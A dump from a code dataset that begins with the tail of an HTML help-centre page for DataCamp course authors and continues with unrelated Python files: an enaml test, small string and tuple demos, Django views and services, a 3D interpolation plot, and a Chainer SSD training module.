article a.intercom-h2b-button { background-color: #263e63; border: 0; }
</style>
<meta property="og:title" content="DataCamp Help Center" />
<meta name="twitter:title" content="DataCamp Help Center" />
<meta property="og:type" content="website" />
<meta property="og:image" content="" />
<meta name="twitter:image" content="" />
</head>
<body class="">
<header class="header">
<div class="container header__container o__ltr" dir="ltr">
<div class="content">
<div class="mo o__centered o__reversed header__meta_wrapper">
<div class="mo__body">
<div class="header__logo">
<a href="/">
<img alt="DataCamp Help Center" src="https://downloads.intercomcdn.com/i/o/81221/856b63d438031754b681746b/4ea2737e4266936fb423911d9c587812.png" />
</a>
</div>
</div>
<div class="mo__aside">
<div class="header__home__url">
<a target="_blank" rel='noopener' href="http://www.datacamp.com/teach"><svg width="14" height="14" viewBox="0 0 14 14" xmlns="http://www.w3.org/2000/svg"><title>Group 65</title><g stroke="#FFF" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"><path d="M11.5 6.73v6.77H.5v-11h7.615M4.5 9.5l7-7M13.5 5.5v-5h-5"/></g></svg><span>Go to DataCamp</span></a>
</div>
</div>
</div>
<h1 class="header__headline">Advice and answers from the DataCamp Team</h1>
<form action="/" autocomplete="off" class="header__form search">
<input type="text" autocomplete="off" class="search__input js__search-input o__ltr" placeholder="Search for articles..." tabindex="1" name="q" value="">
<div class="search_icons">
<button type="submit" class="search__submit o__ltr"></button>
<a class="search__clear-text__icon">
<svg class="interface-icon" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16">
<path d="M8.018 6.643L5.375 4 4 5.375l2.643 2.643L4 10.643 5.375 12l2.643-2.625L10.625 12 12 10.643 9.357 8.018 12 5.375 10.643 4z" />
</svg>
</a>
</form>
</div>
</div>
</div>
</header>
<div class="container">
<div class="content educate_content"><section class="section">
<div class="g__space">
<a href="/getting-started" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="chat-star" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linejoin="round"><path d="M20 34.942c-2.083-.12-4.292-.42-6-.942L3 39l4-9c-3.858-3.086-6-7.246-6-12C1 8.61 10.328 1 21.835 1 33.343 1 43 8.61 43 18c0 1.044-.117 2.065-.342 3.057"></path><path d="M36.016 25L40 33h7l-6 5 3 9-8-5.494L28 47l3-9-6-5h7l4.016-8z"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Getting Started</h2>
<p class="paper__preview">Everything you need to know to begin your DataCamp journey!</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2678519/square_128/pic2-1539176502.JPG?1539176502" alt="Jen Bricker avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+2</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
11 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Jen Bricker,</span> <span class='c__darker'> Yashas Roy</span> and 2 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/courses" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="devices-laptop" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round"><path d="M41 31H7V11h34v20z"></path><path d="M3 35V10a3 3 0 0 1 3-3h36a3 3 0 0 1 3 3v25m-16 0v2H19v-2H1v4a2 2 0 0 0 2 2h42a2 2 0 0 0 2-2v-4H29z" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Courses</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp courses.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2247397/square_128/IMG_2763_final_square_small-1532522734.jpg?1532522734" alt="Nick Carchedi avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2366194/square_128/richie-in-hairnet-1537451295.JPG?1537451295" alt="Richie Cotton avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+7</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
78 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Yashas Roy,</span> <span class='c__darker'> Nick Carchedi,</span> <span class='c__darker'> Richie Cotton</span> and 7 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/daily-practice" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="tools-dashboard" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"><path d="M27 31a3 3 0 0 1-6 0 3 3 0 0 1 6 0zm-.88-2.12l9.9-9.9M5 32h4m34 .002L39 32m2.553-8.27l-3.696 1.53M31.27 13.447l-1.53 3.695M24 12v4m-7.27-2.553l1.53 3.695m-7.694.422l2.826 2.83M6.447 23.73l3.695 1.53"></path><path d="M24 8C11.297 8 1 18.3 1 31v9h46v-9C47 18.3 36.703 8 24 8z"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Daily Practice</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp Daily Practice.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2734728/square_128/Anneleen_Beckers-xtra-small-1541624054.jpg?1541624054" alt="Anneleen Beckers avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
12 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Anneleen Beckers</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/projects" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="book-opened2"><path d="M24 11c0-3.866 10.297-7 23-7v33c-12.703 0-23 3.134-23 7 0-3.866-10.3-7-23-7V4c12.7 0 23 3.134 23 7zm0 0v32m-5-27.52c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.23-7.773-2.127-13-2.48m23-15.52c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.23 7.773-2.127 13-2.48" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Projects</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp projects.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2360843/square_128/20170928_DavidV_ByBBImagery-022-1380-1537479799.jpg?1537479799" alt="David Venturi avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
19 articles in this collection
</span>
<br>
Written by <span class='c__darker'> David Venturi</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/course-editor-basics" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="book-bookmark" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round"><path d="M35 31l-6-6-6 6V7h12v24z"></path><path d="M35 9h6v38H11a4 4 0 0 1-4-4V5" stroke-linejoin="round"></path><path d="M39 9V1H11a4 4 0 0 0 0 8h12" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Course Editor Basics</h2>
<p class="paper__preview">Everything you need to know to get going with our online course editor.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2247397/square_128/IMG_2763_final_square_small-1532522734.jpg?1532522734" alt="Nick Carchedi avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
5 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins</span> and <span class='c__darker'> Nick Carchedi</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/tips-and-tricks" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="comms-mail" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linejoin="round"><path d="M47 3L1 22l18 7L47 3z"></path><path d="M47 3l-8 37-20-11L47 3zM19 29v16l7-12"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Tips & Tricks</h2>
<p class="paper__preview">Become a DataCamp wizard!</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
6 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/frequently-asked-questions-faq" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="chat-question" fill="none" fill-rule="evenodd"><path d="M47 21.268c0 10.363-10.297 18.765-23 18.765-2.835 0-5.55-.418-8.058-1.184L2.725 45 7.9 34.668c-4.258-3.406-6.9-8.15-6.9-13.4C1 10.904 11.297 2.502 24 2.502s23 8.402 23 18.766z" stroke-width="2" stroke-linejoin="round"></path><path d="M25 28.502a2 2 0 1 0 0 4 2 2 0 0 0 0-4" fill="#231F1F"></path><path d="M19 17.75c0-3.312 2.686-6.124 6-6.124 3.313 0 6 2.626 6 5.938 0 3.315-2.687 5.938-6 5.938V26" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Frequently Asked Questions (FAQ)</h2>
<p class="paper__preview">Common questions that arise during content creation.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2366194/square_128/richie-in-hairnet-1537451295.JPG?1537451295" alt="Richie Cotton avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+3</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
48 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Richie Cotton,</span> <span class='c__darker'> Yashas Roy</span> and 3 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/miscellaneous" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="tools-edit"><path d="M14.932 43.968L2 47l3.033-12.93 31.2-31.203a4 4 0 0 1 5.658 0l4.247 4.243a4 4 0 0 1 0 5.656L14.932 43.968zm29.84-29.735L34.82 4.28m7.125 12.782L31.992 7.11M15.436 43.465l-9.9-9.9" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Miscellaneous</h2>
<p class="paper__preview">Have a question for DataCamp, but not about creating content? You'll probably find the answer here.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2830289/square_128/IMG_0665_a-1545331304.jpg?1545331304" alt="Lisa Monteleone avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2859053/square_128/gabriel_about_pic-1546620603.jpg?1546620603" alt="Gabriel de Selding avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
9 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Lisa Monteleone,</span> and <span class='c__darker'> Gabriel de Selding</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
</section>
</div>
</div>
<footer class="footer">
<div class="container">
<div class="content">
<div class="u__cf" dir="ltr">
<div class="footer__logo">
<a href="/">
<img alt="DataCamp Help Center" src="https://downloads.intercomcdn.com/i/o/81221/856b63d438031754b681746b/4ea2737e4266936fb423911d9c587812.png" />
</a>
</div>
<div class="footer__advert logo">
<img src="https://intercom.help/_assets/intercom-a6a6ac0f033657af1aebe2e9e15b94a3cd5eabf6ae8b9916df6ea49099a894d8.png" alt="Intercom" />
<a href="https://www.intercom.com/intercom-link?company=DataCamp&solution=customer-support&utm_campaign=intercom-link&utm_content=We+run+on+Intercom&utm_medium=help-center&utm_referrer=http%3A%2F%2Finstructor-support.datacamp.com%2F&utm_source=desktop-web">We run on Intercom</a>
</div>
</div>
</div>
</div>
</footer>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
window.intercomSettings = {"app_id":"ug0ps1rq"};
</script>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
(function(){var w=window;var ic=w.Intercom;if(typeof ic==="function"){ic('reattach_activator');ic('update',intercomSettings);}else{var d=document;var i=function(){i.c(arguments)};i.q=[];i.c=function(args){i.q.push(args)};w.Intercom=i;function l(){var s=d.createElement('script');s.type='text/javascript';s.async=true;s.src="https://widget.intercom.io/widget/ug0ps1rq";var x=d.getElementsByTagName('script')[0];x.parentNode.insertBefore(s,x);}if(w.attachEvent){w.attachEvent('onload',l);}else{w.addEventListener('load',l,false);}}})()
</script>
<script src="https://intercom.help/_assets/application-4500b8159f32efa509d5464e27ebd8e4735c3a0e4b59bd4aab6c00e8e49c04d2.js" nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0="></script>
</body>
</html>
''' | [
"beiran@hotmail.com"
] | beiran@hotmail.com |
bfd1700ad0198fea64886e0f2aa06687748976c6 | 4979df3343d7b99a9a826bd1cb946ae79fac260c | /tests/test_runner.py | 1ecd57ab36aa321d2148d96008b681ff168fcb63 | [
"BSD-3-Clause"
] | permissive | e-calder/enaml | 753ff329fb8a2192bddbe7166581ed530fb270be | 8f02a3c1a80c0a6930508551c7de1d345095173d | refs/heads/master | 2021-07-30T01:18:29.222672 | 2021-07-27T08:51:50 | 2021-07-27T08:51:50 | 206,089,494 | 0 | 0 | NOASSERTION | 2019-09-03T13:52:44 | 2019-09-03T13:52:44 | null | UTF-8 | Python | false | false | 673 | py | import os
import sys
import pytest
from utils import enaml_run
from enaml.application import Application, deferred_call
from enaml.runner import main
@pytest.fixture
def sys_argv():
""" Fixture that saves sys.argv and restores it after the test completes
"""
argv = sys.argv
try:
yield
finally:
sys.argv = argv
def test_runner(enaml_run, sys_argv):
"""Test invoking the runner application.
"""
dir_path = os.path.abspath(os.path.split(os.path.dirname(__file__))[0])
sys.argv = ['enaml-run',
os.path.join(dir_path,
'examples', 'stdlib', 'mapped_view.enaml')]
main()
| [
"marul@laposte.net"
] | marul@laposte.net |
717c5b17513db524f9ab0c73cc8613c5a5a67ba3 | 7241757441c6ce1c51eef3860cd540d1c3cddf77 | /find.py | 4c9736c81f87a7ed290cc7ee8c0d01da71267f3e | [] | no_license | deepikagithub1994/program_files | 69ce130e934455ff10e6f268206cdb35aca87311 | 69ba23cedaca388339d2b27a846de23de56743a4 | refs/heads/master | 2020-05-18T20:11:53.380820 | 2019-05-02T17:54:34 | 2019-05-02T17:54:34 | 184,625,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | str1="python is a programming language"
index=str1.find("is")
print(index)
str2=str1[index:index+len(str1)]
print(str2)
| [
"noreply@github.com"
] | noreply@github.com |
e328cc4ddbb881174b91f93521be7d3e5d87ce0a | 15b7a9708d6fb6f9ae5ac55830f996c629468910 | /ch06/Ex6_16.py | 686602d686c015c0a9a4d929a1940e73303da2f7 | [] | no_license | Anancha/Python_Bible | 81dfab4ebe7f74c46615403cbd8a37b714b84df1 | d9569abf2ad60393289fcec22b81340a19e28601 | refs/heads/main | 2023-09-03T00:52:58.249183 | 2021-11-12T07:57:56 | 2021-11-12T07:57:56 | 415,224,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | shape_tuple1 = ("square","circle","triangle","rectangle","star")
shape_tuple2 = ("heart","oval")
print("shape_tuple1 = ",shape_tuple1)
print("shape_tuple2 = ",shape_tuple2)
length = len(shape_tuple1)
print("shape_tuple1 = ",length)
print("shape_tuple1[0] = ",shape_tuple1[0])
print("shape_tuple1[4] = ",shape_tuple1[4])
print("shape_tuple1[-5] = ",shape_tuple1[-5])
print("shape_tuple1[-1] = ",shape_tuple1[-1])
print("shape_tuple1[0:5] = ",shape_tuple1[0:5])
print("shape_tuple1[:5] = ",shape_tuple1[:5])
print("shape_tuple1[-4:] = ",shape_tuple1[-4:])
shape_tuple = shape_tuple1 + shape_tuple2
print("combine tuple1 and tuple2 = ",shape_tuple) | [
"noreply@github.com"
] | noreply@github.com |
3ff2044658927d488ab1501d7253b80a1b4ac237 | 7e511e84c0ae1fce2a21f416fd5dfe4d124911ca | /Tamisha_Damas/eCommerce/src/checkout/views.py | 80654ce4219489412dd7379372f0c67539c7e34c | [] | no_license | Tdamas/python_september_2017 | e101e5c9070dbdba2435c1ab2ccc3ab6a2667e66 | 19ee532cb605de810a50d3c20568e7f22ac7333b | refs/heads/master | 2021-09-04T06:13:08.824093 | 2018-01-16T16:03:02 | 2018-01-16T16:03:02 | 102,656,286 | 0 | 0 | null | 2017-09-06T20:41:22 | 2017-09-06T20:41:22 | null | UTF-8 | Python | false | false | 319 | py | from django.contrib.auth.decorators import login_required
# -*- coding: utf-8 -*-
# from __future__ import unicode_literals
from django.shortcuts import render
# Create your views here.
@login_required
def checkout(request):
context = {}
template = 'checkout.html'
return render(request,template,context)
| [
"tamishadamas@Tamishas-MacBook-Pro-2.local"
] | tamishadamas@Tamishas-MacBook-Pro-2.local |
571485bef085f2d83b9c9c91455f355903534501 | 599b057114525fb2d5f5cca59fea4299eebe92bc | /code/Test/第一次训练/A/src/rebuild.py | ab06c3c725683a2f13fb7ea7826da9109939fe50 | [
"MIT"
] | permissive | BYOUINZAKA/MCM2020 | f9b690dbb20fc32f7506f4319ec66b3477c1d9df | 62b71059524d10dff3b80100db608a86a4bb6d9a | refs/heads/master | 2022-12-03T04:25:21.734420 | 2020-08-07T00:33:37 | 2020-08-07T00:33:37 | 283,980,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from pandas import read_csv
from scipy import interpolate
def setAx(ax):
ax.set_xlim(-256, 256)
ax.set_ylim(-256, 256)
ax.set_zlim(0, 100)
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax = Axes3D(plt.figure())
df = read_csv("code\\Test1\\第一次训练\\A\\circles.csv")
ax.plot3D(df['X'], df['Y'], df['Z'], 'gray')
ax.scatter3D(df['X'], df['Y'], df['Z'], cmap='b', s=900, marker='o')
setAx(ax)
datas = read_csv("code\\Test1\\第一次训练\\A\\circles.csv").to_numpy().T
y, x, z = datas[1:4]
yy = np.linspace(y[0], y[-1], 2000)
ax = Axes3D(plt.figure())
fyz = interpolate.interp1d(y, z, kind='slinear')
fyx = interpolate.interp1d(y, x, kind='slinear')
ax.scatter3D(fyx(yy), yy, fyz(yy), s=900, c='gray')
setAx(ax)
plt.show()
| [
"2606675531@qq.com"
] | 2606675531@qq.com |
fb8c703506380ca2d705c4bcfc8f8db05c33c5b4 | f79fd39560a1be43bc47b4460ffdc7f57c8d2e2f | /wk1-ex67.py | 62b9a8b57bd279eeaba3ef8bc79f18ba1e8f6e42 | [] | no_license | dmr282/python_4_neteng | f7894e9393c653fac1871f59de0dae86ca73e5dd | 1818060a17019b283397094b71679da0110e061c | refs/heads/master | 2020-03-28T21:15:14.874527 | 2018-09-18T14:57:24 | 2018-09-18T14:57:24 | 149,141,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | import yaml, json
for i in range(4):
print i
my_list = []
a = 0
b = 0
i = my_list
my_dict = {a: '1', b: '2'}
my_list.append(my_dict)
with open("some_file.yml", "w") as f:
f.write(yaml.dump(my_list, default_flow_style=False))
with open("some_file2.yml", "w") as f2:
f2.write(json.dumps(my_list))
| [
"dmr282@cornell.edu"
] | dmr282@cornell.edu |
84d30739ba48f488394835d53e76120ec6c08546 | c89b0511ce12c06e4cbfe28279a19314e042e783 | /scripts/chainer/train_utils.py | 0277bbd9b9ceefaaeef2197fe6cb923f062ba2b6 | [] | no_license | mizmizo/fcn_detector | 072fdb5d6c40c65ea3f4abbf36300d15779ea695 | 0a96b3811a0a3ae5f25f4dc1b733e5cc928b7117 | refs/heads/master | 2021-01-01T13:35:18.930162 | 2017-10-10T14:54:22 | 2017-10-10T14:54:22 | 97,581,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,095 | py | #!/usr/bin/env python
import copy
import numpy as np
import chainer
from chainer.datasets import TransformDataset
from chainer.optimizer import WeightDecay
from chainer import serializers
from chainer import training
from chainer.training import extensions
from chainer.training import triggers
from chainercv.extensions import DetectionVOCEvaluator
from chainercv.links.model.ssd import GradientScaling
from chainercv.links.model.ssd import multibox_loss
from chainercv.links import SSD512
from chainercv import transforms
from chainercv.links.model.ssd import random_crop_with_bbox_constraints
from chainercv.links.model.ssd import random_distort
from chainercv.links.model.ssd import resize_with_random_interpolation
from chainercv.visualizations import vis_bbox
import matplotlib.pyplot as plot
class MultiboxTrainChain(chainer.Chain):
def __init__(self, model, alpha=1, k=3):
super(MultiboxTrainChain, self).__init__()
with self.init_scope():
self.model = model
self.alpha = alpha
self.k = k
def __call__(self, imgs, gt_mb_locs, gt_mb_labels):
mb_locs, mb_confs = self.model(imgs)
loc_loss, conf_loss = multibox_loss(
mb_locs, mb_confs, gt_mb_locs, gt_mb_labels, self.k)
loss = loc_loss * self.alpha + conf_loss
chainer.reporter.report(
{'loss': loss, 'loss/loc': loc_loss, 'loss/conf': conf_loss},
self)
return loss
class Transform(object):
def __init__(self, coder, size, mean):
# to send cpu, make a copy
self.coder = copy.copy(coder)
self.coder.to_cpu()
self.size = size
self.mean = mean
def __call__(self, in_data):
# There are five data augmentation steps
# 1. Color augmentation
# 2. Random expansion
# 3. Random cropping
# 4. Resizing with random interpolation
# 5. Random horizontal flipping
img, bbox, label = in_data
# 1. Color augmentation
#img = random_distort(img)
# 2. Random expansion
# if np.random.randint(2):
# img, param = transforms.random_expand(
# img, fill=self.mean, return_param=True)
# bbox = transforms.translate_bbox(
# bbox, y_offset=param['y_offset'], x_offset=param['x_offset'])
# 3. Random cropping
# img, param = random_crop_with_bbox_constraints(
# img, bbox, return_param=True)
# bbox, param = transforms.crop_bbox(
# bbox, y_slice=param['y_slice'], x_slice=param['x_slice'],
# allow_outside_center=False, return_param=True)
# label = label[param['index']]
# 4. Resizing with random interpolatation
_, H, W = img.shape
img = resize_with_random_interpolation(img, (self.size, self.size))
bbox = transforms.resize_bbox(bbox, (H, W), (self.size, self.size))
# 5. Random horizontal flipping
# img, params = transforms.random_flip(
# img, x_random=True, return_param=True)
# bbox = transforms.flip_bbox(
# bbox, (self.size, self.size), x_flip=params['x_flip'])
# Preparation for SSD network
img -= self.mean
mb_loc, mb_label = self.coder.encode(bbox, label)
return img, mb_loc, mb_label
def train(train_data, val_data, label_names,
iteration, lr, step_points,
batchsize, gpu, out, val_iteration,
log_iteration, loaderjob,
resume):
"""Train SSD
"""
pretrained_model = SSD512(
pretrained_model='voc0712')
model = SSD512(n_fg_class=len(label_names))
model.extractor.copyparams(pretrained_model.extractor)
model.multibox.loc.copyparams(pretrained_model.multibox.loc)
model.use_preset('evaluate')
train_chain = MultiboxTrainChain(model)
if gpu >= 0:
chainer.cuda.get_device(gpu).use()
model.to_gpu()
train_data = TransformDataset(
train_data,
Transform(model.coder, model.insize, model.mean))
if loaderjob <= 0:
train_iter = chainer.iterators.SerialIterator(train_data, batchsize)
else:
train_iter = chainer.iterators.MultiprocessIterator(
train_data, batchsize, n_processes=min((loaderjob, batchsize)))
val_iter = chainer.iterators.SerialIterator(
val_data, batchsize, repeat=False, shuffle=False)
# initial lr is set by ExponentialShift
optimizer = chainer.optimizers.MomentumSGD()
optimizer.setup(train_chain)
for param in train_chain.params():
if param.name == 'b':
param.update_rule.add_hook(GradientScaling(2))
else:
param.update_rule.add_hook(WeightDecay(0.0005))
updater = training.StandardUpdater(train_iter, optimizer, device=gpu)
trainer = training.Trainer(updater, (iteration, 'iteration'), out)
trainer.extend(
extensions.ExponentialShift('lr', 0.1, init=lr),
trigger=triggers.ManualScheduleTrigger(step_points, 'iteration'))
val_interval = (val_iteration, 'iteration')
trainer.extend(
DetectionVOCEvaluator(
val_iter, model, use_07_metric=True,
label_names=label_names),
trigger=val_interval)
log_interval = log_iteration, 'iteration'
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.observe_lr(), trigger=log_interval)
trainer.extend(extensions.PrintReport(
['epoch', 'iteration', 'lr',
'main/loss', 'main/loss/loc', 'main/loss/conf',
'validation/main/map']),
trigger=log_interval)
trainer.extend(extensions.ProgressBar(update_interval=10))
trainer.extend(extensions.snapshot(), trigger=val_interval)
trainer.extend(
extensions.snapshot_object(model, 'model_iter_{.updater.iteration}'),
trigger=val_interval)
if resume:
serializers.load_npz(resume, trainer)
trainer.run()
chainer.serializers.save_npz("model.npz", model)
chainer.serializers.save_npz("optimizer.npz", optimizer)
| [
"mizohana@jsk.imi.i.u-tokyo.ac.jp"
] | mizohana@jsk.imi.i.u-tokyo.ac.jp |
f1de0d7e87d247c0c994bacd5314c93f2f12f719 | 62f00da4edbf48f5198d14c2a8333b648cfb5dfc | /expedientes/services/misExpedientes.py | b02687f13b94bddf9c5b8ed53d5c2739b23a5135 | [] | no_license | sergiomaciel/juzgadosonline | 31d26ea42f3d2e5dcb5aaa931636ac2976ac7a0c | eb4ae8298410c4c3fcf04ed71f7f560a8eb200d3 | refs/heads/master | 2022-12-10T19:55:16.857326 | 2019-06-30T21:17:00 | 2019-06-30T21:17:00 | 189,388,673 | 0 | 0 | null | 2022-12-08T05:48:06 | 2019-05-30T09:51:11 | JavaScript | UTF-8 | Python | false | false | 2,387 | py | import sys
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.models import User
from datetime import datetime
from expedientes.models import Expediente, Actualizacion
from juzgados.services import juzgadoService
class MisExpediente():
def __init__(self, user:User):
self.user = user
self.suscripciones = []
self.autor = Expediente.objects.filter(autor=self.user)
expedientes = Expediente.objects.filter(subscriptores=self.user)
for expediente in expedientes:
try:
actualizaciones = Actualizacion.objects.filter(expediente=expediente.pk).order_by('-fecha_publicado')
ultimaAct = actualizaciones[0].fecha_publicado
item = {
'id':expediente.pk,
'numero':expediente.numero,
'juzgado':expediente.juzgado,
'ultimaAct':ultimaAct,
'DiasUltimaAct':(datetime.now() - datetime.strptime(ultimaAct.strftime('%Y-%m-%d'), "%Y-%m-%d")).days
}
self.suscripciones.append(item)
except IndexError:
pass
def suscriptos(self):
return self.suscripciones
def novedades(self, hasta):
novedades = []
for expediente in self.suscripciones:
if ( int(expediente.get('DiasUltimaAct')) <= int(hasta)):
novedades.append(expediente)
return novedades
def preCargaCrear(self, idJuzgado, numero):
juzgado = juzgadoService()
E = Expediente(
juzgado=juzgado.getJuzgado(idJuzgado),
numero=numero,
actor='',
demandado='',
causa='',
autor=self.user
)
E.save()
E.subscriptores.add(self.user)
def preCargaActualizar(self, idExpediente, idJuzgado, numero):
try:
juzgado = juzgadoService()
E = Expediente.objects.get(pk=idExpediente)
E.juzgado = juzgado.getJuzgado(idJuzgado)
E.numero = numero
E.save(update_fields=[
'juzgado',
'numero'
])
except ObjectDoesNotExist:
pass
def creados(self):
return self.autor
def getExpediente(self,idExpediente):
res = ' '
for expediente in self.autor:
if (expediente.id == idExpediente):
return expediente
return res
| [
"dario.maciel.91@gmail.com"
] | dario.maciel.91@gmail.com |
